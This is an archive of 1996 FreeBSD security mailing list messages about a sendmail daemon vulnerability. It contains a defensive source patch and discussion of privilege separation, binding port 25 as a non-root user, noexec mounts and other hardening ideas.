Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA21065 for security-outgoing; Mon, 18 Nov 1996 07:15:26 -0800 (PST) Received: from kdat.calpoly.edu (kdat.csc.calpoly.edu [129.65.54.101]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA21058 for ; Mon, 18 Nov 1996 07:15:22 -0800 (PST) Received: (from nlawson@localhost) by kdat.calpoly.edu (8.6.12/N8) id HAA03705; Mon, 18 Nov 1996 07:15:18 -0800 From: Nathan Lawson Message-Id: <199611181515.HAA03705@kdat.calpoly.edu> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: batie@agora.rdrop.com (Alan Batie) Date: Mon, 18 Nov 1996 07:15:18 -0800 (PST) Cc: freebsd-security@freebsd.org In-Reply-To: from "Alan Batie" at Nov 17, 96 05:16:36 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > Sendmail is well understood and well maintained with a very long track > > record. Other mailers, no matter how much better, don't match this > > track record. > > Yup, sendmail has a long track record of the "security hole of the month"; > I've yet to see one for smail. I would like to switch to sendmail, as I > hear it deals with mail queues a lot better these days, and smail > development seems to have gone into a black hole, but until sendmail can > make it a whole month or two without a CERT advisory on it... I've had the displeasure of reviewing the Smail code and found it just as convoluted as sendmail, and in fact, just as insecure. Last year, a colleague posted three Smail bugs to Bugtraq. There were many other potential holes, but I stopped the review process and decided to go with a SMAP hybrid. Note that I am not recommending sendmail, but I think your exultation with smail is a bit premature. -- Nate Lawson "There are a thousand hacking at the branches of CPE Senior evil to one who is striking at the root." CSL Admin -- Henry David Thoreau, 'Walden', 1854 From owner-freebsd-security Mon Nov 18 07:30:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA21993 for security-outgoing; Mon, 18 Nov 1996 07:30:24 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA21986 for ; Mon, 18 Nov 1996 07:30:19 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id IAA23049; Mon, 18 Nov 1996 08:30:15 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id IAA04580; Mon, 18 Nov 1996 08:22:55 -0700 (MST) Date: Mon, 18 Nov 1996 08:22:54 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Poul-Henning Kamp cc: freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <9172.848302243@critter.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk What does sendmail need to do WRT binding to ports that a webserver doesn't? Programs such as webservers work quite well with a parent process running as root that binds to the port and forks childs running as some non-root uid to handle requests. Why couldn't (this part) of sendmail's problems be fixed the same way? On Mon, 18 Nov 1996, Poul-Henning Kamp wrote: > What we REALLY need, is a way for root, to hand out certain priviledges. > > Imagine this: > > sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp` > sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp` > sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp` > sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp` > > This means that users with UID smtp can bind to socket 25 (aka smtp), > and so on. Now sendmail NEVER needs to be root. > > How's that for security ? From owner-freebsd-security Mon Nov 18 07:45:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA23046 for security-outgoing; Mon, 18 Nov 1996 07:45:52 -0800 (PST) Received: from knecht.Sendmail.ORG (root@knecht.oxford.reference.com [205.217.47.98]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA23029; Mon, 18 Nov 1996 07:45:43 -0800 (PST) Received: from knecht.Sendmail.ORG (eric@LOCALHOST [127.0.0.1]) by knecht.Sendmail.ORG (8.8.3/8.8.3) with ESMTP id HAA25568; Mon, 18 Nov 1996 07:45:15 -0800 (PST) Message-Id: <199611181545.HAA25568@knecht.Sendmail.ORG> X-Mailer: exmh version 1.6.7 5/3/96 To: "S(pork)" From: Eric Allman X-URL: http://WWW.InReference.COM/~eric cc: Igor Roshchin , Ollivier Robert , freebsd-security@freebsd.org, freebsd-hackers@freebsd.org Subject: Re: New sendmail bug... In-reply-to: Mail from "S(pork)" dated Sun, 17 Nov 1996 21:39:11 CST Date: Mon, 18 Nov 1996 07:45:13 -0800 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I see there's been a lot of traffic, so this is probably answered already -- but just remove the call to vendor_daemon_setup. eric ============= In Reply To: =========================================== : From: "S(pork)" : Subject: Re: New sendmail bug... : Date: Sun, 17 Nov 1996 21:39:11 -0600 (CST) : But if one does have to run 8.7.6 until they have time to breath, does : anyone know if the error that Igor and I are seeing compiling 8.7.6 from : -stable can be avoided? I first patched with the 2 line setgid, setuid : patch I saw on the list, then I grabbed what was in the current -stable : source and got the same error as Igor. It compiled after deleting the : line in main.c that I saw in the errors, and it seems to work, but : reckless deletion scares me. I wonder what the line was for.... : : Anyhow, any help is appreciated. : : Thanks, : : Charles : : On Sun, 17 Nov 1996, Eric Allman wrote: : : > This patch is against 8.8.2, not 8.7.6. You need to upgrade to 8.8; : > 8.7.x is no long supported. : > : > eric : > : > : > ============= In Reply To: =========================================== : > : From: igor@alecto.physics.uiuc.edu (Igor Roshchin) : > : Subject: Re: New sendmail bug... : > : Date: Sun, 17 Nov 1996 21:12:33 -0600 (CST) : > : > : Hello! : > : : > : May be I am missing something, : > : but I was not able to compile the patched version : > : of the sendmail 8.7.6.4, : > : as it appears in FreeBSD distribution (sup.freebsd.org). : > : : > : main.o: Undefined symbol `_vendor_daemon_setup' referenced from text segm ent : > : *** Error code 1 : > : : > : : > : Is it a problem due to the version of FreeBSD ? : > : I tried it on 2.1.5-stable and 2.1.5-release; - : > : results were the same. : > : : > : Thanks in advance for your suggestions. : > : : > : IgoR : > : : > : : > : > : > : > ------- main.c ------- : > : > *** - Wed Dec 31 16:00:00 1969 : > : > --- main.c Sat Nov 16 07:07:17 1996 : > : > *************** : > : > *** 493,507 **** : > : > { : > : > case MD_DAEMON: : > : > case MD_FGDAEMON: : > : > ! # ifdef DAEMON : > : > ! if (RealUid != 0) : > : > ! { : > : > ! usrerr("Permission denied"); : > : > ! exit(EX_USAGE); : > : > ! } : > : > ! vendor_daemon_setup(CurEnv); : > : > ! /* fall through ... */ : > : > ! # else : > : > usrerr("Daemon mode not implemented"); : > : > ExitStat = EX_USAGE; : > : > break; : > : > --- 493,499 ---- : > : > { : > : > case MD_DAEMON: : > : > case MD_FGDAEMON: : > : > ! # ifndef DAEMON : > : > usrerr("Daemon mode not implemented"); : > : > ExitStat = EX_USAGE; : > : > break; : > : > *************** : > : > *** 899,904 **** : > : > --- 891,904 ---- : > : > /* fall through ... */ : > : > : > : > case MD_DAEMON: : > : > + /* check for permissions */ : > : > + if (RealUid != 0) : > : > + { : > : > + usrerr("Permission denied"); : > : > + exit(EX_USAGE); : > : > + } : > : > + vendor_daemon_setup(CurEnv); : > : > + : > : > /* remove things that don't make sense in daemon mode * / : > : > FullName = NULL; : > : > GrabTo = FALSE; : > : > *************** : > : > *** 1932,1937 **** : > : > --- 1932,1946 ---- : > : > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0] ); : > : > #endif : > : > releasesignal(SIGHUP); : > : > + if (setuid(RealUid) < 0 || setgid(RealGid) < 0) : > : > + { : > : > + #ifdef LOG : > : > + if (LogLevel > 0) : > : > + syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m", : > : > + RealUid, RealGid); : > : > + #endif : > : > + exit(EX_OSERR); : > : > + } : > : > execv(SaveArgv[0], (ARGV_T) SaveArgv); : > : > #ifdef LOG : > : > if (LogLevel > 0) : > : > : > : > : > : : > : > : > : From owner-freebsd-security Mon Nov 18 07:49:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA23256 for security-outgoing; Mon, 18 Nov 1996 07:49:45 -0800 (PST) Received: from fps.biblos.unal.edu.co ([168.176.37.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA23238 for ; Mon, 18 Nov 1996 07:49:30 -0800 (PST) From: pgiffuni@fps.biblos.unal.edu.co Received: from localhost by fps.biblos.unal.edu.co (AIX 4.1/UCB 5.64/4.03) id AA20872; Mon, 18 Nov 1996 10:53:24 -0500 Date: Mon, 18 Nov 1996 10:53:24 -0500 (EST) To: Warner Losh Cc: Mark Newton , Alan Batie , adam@homeport.org, freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 17 Nov 1996, Warner Losh wrote: > In message <9611180247.AA15359@communica.com.au> Mark Newton writes: > : indeed, precisely what I have done with it here at Communica, where > : sendmail runs as the unprivileged "smtp" user). > > I don't buy this. You need to be able to create a mailbox of an > > What am I missing? > I haven`t done that either, but some firewall software do it. I only change the deamon`s uid in the sendmail.cf so that it will use an unprivileged user that doesn`t even own a shell, as is explained in the CERT advisory. Pedro. > Warner > From owner-freebsd-security Mon Nov 18 08:07:05 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA24036 for security-outgoing; Mon, 18 Nov 1996 08:07:05 -0800 (PST) Received: from fps.biblos.unal.edu.co ([168.176.37.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA24024 for ; Mon, 18 Nov 1996 08:06:42 -0800 (PST) From: pgiffuni@fps.biblos.unal.edu.co Received: from localhost by fps.biblos.unal.edu.co (AIX 4.1/UCB 5.64/4.03) id AA24360; Mon, 18 Nov 1996 11:11:29 -0500 Date: Mon, 18 Nov 1996 11:11:29 -0500 (EST) To: Marc Slemko Cc: Warner Losh , Mark Newton , freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 17 Nov 1996, Marc Slemko wrote: > > This would be implemented with either one big program or, more likely, > a bunch of little programs with a consistent pretty (ie. sysinstall > like, although libdialog is ugly) interface and a parent program that > lets you run any of them. Perhaps some day I will get around to > trying to make such a program. > AIX has a nice program (probably just a script) called securetcpip. You run it once and it closes tftp, rlogin, and a bunch of services. The disavantage is that you if you run it you`ll probably have to reinstall to open one of the "unsecure" services. Probably it`s a complement to a C2 security package. For the time being the logical choice is to correctly configure the newest sendmail, port other mailers and pray ! Pedro From owner-freebsd-security Mon Nov 18 08:45:16 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA26200 for security-outgoing; Mon, 18 Nov 1996 08:45:16 -0800 (PST) Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id IAA26195; Mon, 18 Nov 1996 08:45:12 -0800 (PST) Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by who.cdrom.com (8.7.5/8.6.11) with SMTP id IAA08736 ; Mon, 18 Nov 1996 08:45:05 -0800 (PST) Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <17373(1)>; Mon, 18 Nov 1996 08:42:59 PST Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177557>; Mon, 18 Nov 1996 08:42:47 -0800 X-Mailer: exmh version 1.6.7 5/3/96 To: Don Lewis cc: Michael Smith , chat@freebsd.org, security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Mon, 18 Nov 1996 01:18:36 PST." <199611180918.BAA15007@salsa.gv.ssi1.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 18 Nov 1996 08:42:36 PST From: Bill Fenner Message-Id: <96Nov18.084247pst.177557@crevenia.parc.xerox.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199611180918.BAA15007@salsa.gv.ssi1.com>you write: >I don't need a compiler, and I don't want to make >it any easier than necessary for some cracker d00d to compile his r00t >kit. If you want to save space, that's fine, but don't delude yourself by thinking that your cracker d00d can't just go find someone on IRC with a FreeBSD box who will send him binaries. Bill From owner-freebsd-security Mon Nov 18 08:50:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA26511 for security-outgoing; Mon, 18 Nov 1996 08:50:59 -0800 (PST) Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA26505 for ; Mon, 18 Nov 1996 08:50:55 -0800 (PST) Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <17036(6)>; Mon, 18 Nov 1996 08:50:20 PST Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177557>; Mon, 18 Nov 1996 08:50:03 -0800 X-Mailer: exmh version 1.6.7 5/3/96 To: Michael Smith cc: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Sun, 17 Nov 1996 19:35:04 PST." <199611180335.OAA17231@genesis.atrad.adelaide.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 18 Nov 1996 08:50:01 PST From: Bill Fenner Message-Id: <96Nov18.085003pst.177557@crevenia.parc.xerox.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199611180335.OAA17231@genesis.atrad.adelaide.edu.au>you write: >...if it were possible to be non-root and bind to port 25... It is, of course, possible to run as root for *just long enough* to bind to port 25. Then setuid("smtp"). Bill From owner-freebsd-security Mon Nov 18 08:54:44 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA26854 for security-outgoing; Mon, 18 Nov 1996 08:54:44 -0800 (PST) Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA26842 for ; Mon, 18 Nov 1996 08:54:39 -0800 (PST) Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <17573(5)>; Mon, 18 Nov 1996 08:53:29 PST Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177557>; Mon, 18 Nov 1996 08:53:04 -0800 X-Mailer: exmh version 1.6.7 5/3/96 To: Warner Losh cc: newton@communica.com.au (Mark Newton), batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Sun, 17 Nov 1996 20:45:35 PST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 18 Nov 1996 08:53:00 PST From: Bill Fenner Message-Id: <96Nov18.085304pst.177557@crevenia.parc.xerox.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message you write: >In message <9611180312.AA15775@communica.com.au> Mark Newton writes: >: ... create the mailbox at the same time that you create >: the user ... > >And if that file is ever removed? Then you are SOL. Then you exit with EX_TEMPFAIL and log an error. sendmail will keep the mail in the queue, and the person monitoring the logs will notice and recreate the missing mailbox. Bill From owner-freebsd-security Mon Nov 18 09:11:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA28101 for security-outgoing; Mon, 18 Nov 1996 09:11:04 -0800 (PST) Received: from fps.biblos.unal.edu.co ([168.176.37.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id JAA28078 for ; Mon, 18 Nov 1996 09:10:49 -0800 (PST) From: pgiffuni@fps.biblos.unal.edu.co Received: from localhost by fps.biblos.unal.edu.co (AIX 4.1/UCB 5.64/4.03) id AA37368; Mon, 18 Nov 1996 12:15:30 -0500 Date: Mon, 18 Nov 1996 12:15:30 -0500 (EST) To: Marc Slemko Cc: Poul-Henning Kamp , freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk I run it under inetd, as tcp_wrappers needs it there. BTW if some is writing from an "UNKNOWN" host I can`t hear you !! Pedro. On Mon, 18 Nov 1996, Marc Slemko wrote: > What does sendmail need to do WRT binding to ports that a webserver > doesn't? Programs such as webservers work quite well with a parent > process running as root that binds to the port and forks childs running as > some non-root uid to handle requests. Why couldn't (this part) of > sendmail's problems be fixed the same way? > > On Mon, 18 Nov 1996, Poul-Henning Kamp wrote: > > > What we REALLY need, is a way for root, to hand out certain priviledges. > > > > Imagine this: > > > > sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp` > > sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp` > > sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp` > > sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp` > > > > This means that users with UID smtp can bind to socket 25 (aka smtp), > > and so on. Now sendmail NEVER needs to be root. > > > > How's that for security ? > > From owner-freebsd-security Mon Nov 18 09:16:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA28492 for security-outgoing; Mon, 18 Nov 1996 09:16:55 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA28486; Mon, 18 Nov 1996 09:16:52 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id JAA15646; Mon, 18 Nov 1996 09:16:36 -0800 (PST) From: Don Lewis Message-Id: <199611181716.JAA15646@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 09:16:35 -0800 In-Reply-To: Bill Fenner "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 8:42am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Bill Fenner , Don Lewis Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: chat@freebsd.org, security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 8:42am, Bill Fenner wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } In message <199611180918.BAA15007@salsa.gv.ssi1.com>you write: } >I don't need a compiler, and I don't want to make } >it any easier than necessary for some cracker d00d to compile his r00t } >kit. } } If you want to save space, that's fine, but don't delude yourself by thinking } that your cracker d00d can't just go find someone on IRC with a FreeBSD box } who will send him binaries. I'm not counting on gaining much security that way, but my philosophy is to remove everything that isn't absolutely needed. What isn't present can't be used against me. I do consider the importation of any files to be a security breach. I just thought of a totally wicked way of guarding against imported binaries, though. Just randomize the syscall numbers when building the kernal and userland binaries. For best effect, the userland binaries should be statically linked and the shared libraries removed. As long as the kernel can withstand crashme, it should be fine ;-) Too bad it looks like such a pain to do this :-( Another possibility would be to digitally sign all the binaries and hack the kernel to only run binaries with the proper signature. --- Truck From owner-freebsd-security Mon Nov 18 09:59:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA01437 for security-outgoing; Mon, 18 Nov 1996 09:59:32 -0800 (PST) Received: from brimstone.gage.com (brimstone.gage.com [205.217.2.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA01432 for ; Mon, 18 Nov 1996 09:59:29 -0800 (PST) Received: (from mail@localhost) by brimstone.gage.com (8.8.3/8.7.3) id LAA03165; Mon, 18 Nov 1996 11:58:54 -0600 (CST) Received: from octopus.gage.com(158.60.57.50) by brimstone.gage.com via smap (V2.0beta) id xma003163; Mon, 18 Nov 96 11:58:33 -0600 Received: from squid.gage.com (squid [158.60.57.101]) by octopus.gage.com (8.7.5/8.7.3) with SMTP id LAA15965; Mon, 18 Nov 1996 11:49:16 -0600 (CST) Received: from schemer by squid.gage.com (NX5.67e/NX3.0S) id AA29784; Mon, 18 Nov 96 11:49:10 -0600 Message-Id: <9611181749.AA29784@squid.gage.com> Received: by schemer.gage.com (NX5.67g/NX3.0X) id AA01926; Mon, 18 Nov 96 11:49:34 -0600 Content-Type: text/plain Mime-Version: 1.0 (NeXT Mail 4.0 v146.2) In-Reply-To: <96Nov18.085003pst.177557@crevenia.parc.xerox.com> X-Nextstep-Mailer: Mail 3.3 (Enhance 1.3) Received: by NeXT.Mailer (1.146.2) From: Ben Black Date: Mon, 18 Nov 96 11:49:32 -0600 To: Bill Fenner Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: Michael Smith , freebsd-security@freebsd.org References: <96Nov18.085003pst.177557@crevenia.parc.xerox.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >It is, of course, possible to run as root for *just long enough* to bind to >port 25. Then setuid("smtp"). > even better would be finer grained control over access to low numbered ports so you wouldn't need to be root to bind port 25. b3n From owner-freebsd-security Mon Nov 18 10:11:23 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA01991 for security-outgoing; Mon, 18 Nov 1996 10:11:23 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA01978 for ; Mon, 18 Nov 1996 10:11:18 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPY9n-0004uG-00; Mon, 18 Nov 1996 11:10:55 -0700 To: Bill Fenner Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: Michael Smith , freebsd-security@freebsd.org In-reply-to: Your message of "Mon, 18 Nov 1996 08:50:01 PST." <96Nov18.085003pst.177557@crevenia.parc.xerox.com> References: <96Nov18.085003pst.177557@crevenia.parc.xerox.com> Date: Mon, 18 Nov 1996 11:10:55 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <96Nov18.085003pst.177557@crevenia.parc.xerox.com> Bill Fenner writes: : It is, of course, possible to run as root for *just long enough* to bind to : port 25. Then setuid("smtp"). You then must give up running the shell scripts in the users' .forward file as that user. mail.local doesn't do this, btw. Warner From owner-freebsd-security Mon Nov 18 10:18:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA02328 for security-outgoing; Mon, 18 Nov 1996 10:18:50 -0800 (PST) Received: from grackle.grondar.za (grackle.grondar.za [196.7.18.131]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA02318; Mon, 18 Nov 1996 10:18:46 -0800 (PST) Received: from grackle.grondar.za (localhost.grondar.za [127.0.0.1]) by grackle.grondar.za (8.8.2/8.7.3) with ESMTP id UAA12284; Mon, 18 Nov 1996 20:17:38 +0200 (SAT) Message-Id: <199611181817.UAA12284@grackle.grondar.za> To: Don Lewis cc: Bill Fenner , chat@freebsd.org, security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Date: Mon, 18 Nov 1996 20:17:37 +0200 From: Mark Murray Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Don Lewis wrote: > I'm not counting on gaining much security that way, but my philosophy > is to remove everything that isn't absolutely needed. What isn't present > can't be used against me. I do consider the importation of any files > to be a security breach. > > I just thought of a totally wicked way of guarding against imported binaries, > though. Just randomize the syscall numbers when building the kernal and > userland binaries. For best effect, the userland binaries should be > statically linked and the shared libraries removed. As long as the kernel > can withstand crashme, it should be fine ;-) Too bad it looks like such > a pain to do this :-( Much easier is to put the users onto a volume that is mounted -noexec. This works for compiled binaries, not scripts. M -- Mark Murray PGP key fingerprint = 80 36 6E 40 83 D6 8A 36 This .sig is umop ap!sdn. BC 06 EA 0E 7A F2 CE CE From owner-freebsd-security Mon Nov 18 10:19:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA02437 for security-outgoing; Mon, 18 Nov 1996 10:19:41 -0800 (PST) Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA02432 for ; Mon, 18 Nov 1996 10:19:37 -0800 (PST) Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <17626(1)>; Mon, 18 Nov 1996 10:18:46 PST Received: by crevenia.parc.xerox.com id <177557>; Mon, 18 Nov 1996 10:18:25 -0800 From: Bill Fenner To: fenner@parc.xerox.com, imp@village.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: freebsd-security@freebsd.org, msmith@atrad.adelaide.edu.au Message-Id: <96Nov18.101825pst.177557@crevenia.parc.xerox.com> Date: Mon, 18 Nov 1996 10:18:10 PST Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >You then must give up running the shell scripts in the users' .forward >file as that user. mail.local doesn't do this, btw. Sorry, I forgot about this since Xerox doesn't allow .forward files at all. Bill From owner-freebsd-security Mon Nov 18 10:31:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA03114 for security-outgoing; Mon, 18 Nov 1996 10:31:13 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA03102; Mon, 18 Nov 1996 10:31:05 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id KAA15909; Mon, 18 Nov 1996 10:30:55 -0800 (PST) From: Don Lewis Message-Id: <199611181830.KAA15909@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 10:30:55 -0800 In-Reply-To: Mark Murray "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 8:17pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Mark Murray Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: chat@freebsd.org, security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 8:17pm, Mark Murray wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } } Much easier is to put the users onto a volume that is mounted -noexec. } This works for compiled binaries, not scripts. Users, what users? Oh, I'm definitely doing the -noexec thing on anything that's writable, and -rdonly on anything that has executables. Not to mention nosuid and nodev as appropriate. Since I'm removing most of the binaries, I'm not too worried about scripts, even assuming they could get executed in spite of my other measures. There's only so much that you can do with cat and echo ;-) --- Truck From owner-freebsd-security Mon Nov 18 10:34:38 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA03302 for security-outgoing; Mon, 18 Nov 1996 10:34:38 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA03296 for ; Mon, 18 Nov 1996 10:34:34 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id KAA15915; Mon, 18 Nov 1996 10:32:32 -0800 (PST) From: Don Lewis Message-Id: <199611181832.KAA15915@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 10:32:32 -0800 In-Reply-To: Ben Black "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 11:49am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Ben Black , Bill Fenner Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: freebsd-security@FreeBSD.org Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 11:49am, Ben Black wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } >It is, of course, possible to run as root for *just long enough* to bind to } >port 25. Then setuid("smtp"). } > } } even better would be finer grained control over access to low numbered ports } so you wouldn't need to be root to bind port 25. Be careful, that blade cuts both ways. If you do this then you only need to be able to gain access to the smtp user in order to steal the mail. This may be easier than attacking root. --- Truck From owner-freebsd-security Mon Nov 18 10:45:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA03796 for security-outgoing; Mon, 18 Nov 1996 10:45:46 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA03791 for ; Mon, 18 Nov 1996 10:45:44 -0800 (PST) Received: (from 